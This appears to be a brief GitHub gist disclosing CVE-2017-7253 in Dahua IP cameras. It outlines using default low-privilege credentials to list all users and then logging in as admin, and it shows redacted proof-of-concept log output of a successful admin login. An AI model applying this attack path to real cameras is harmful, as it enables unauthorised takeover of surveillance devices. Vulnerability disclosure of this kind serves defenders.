Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Dahua IPC Information Disclosure & Privilege Escalation
Dahua IPC Information Disclosure & Privilege Escalation
CVE-2017-7253
I.Dahua IP Camera devices 3.200.0001.6 can be exploited via these steps, I will update more information later after 90 days expiration.
1. Use the default low-privilege credentials to list all users via a request to the
abastract URI.
2. Login to the IP camera with admin credentials so as to obtain full control of the target IP camera.
II.logs generated by POC
> [<] 888888
> [<] 4xxxxxxM
> ------------------------------------------------
> [i] > Admin Credential Login
> [<]200
> [<]{ "error" : { "code" : 268632079, "message" : "Component error: login challenge!" },
> "id" : 10000, "params" : { "encryption" : "OldDigest", "random" : "", "realm" :
> "Login to " }, "result" : false, "session" : 49319424 }
>
> [i] session is 49319424
> ------------------------------------------------
> [i] >Admin Credential Login again with session:49319424
> [<]200
> [<]{ "id" : 10000, "params" : null, "result" : true, "session" : 49319424 }
>
> Admin Login Successfully!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.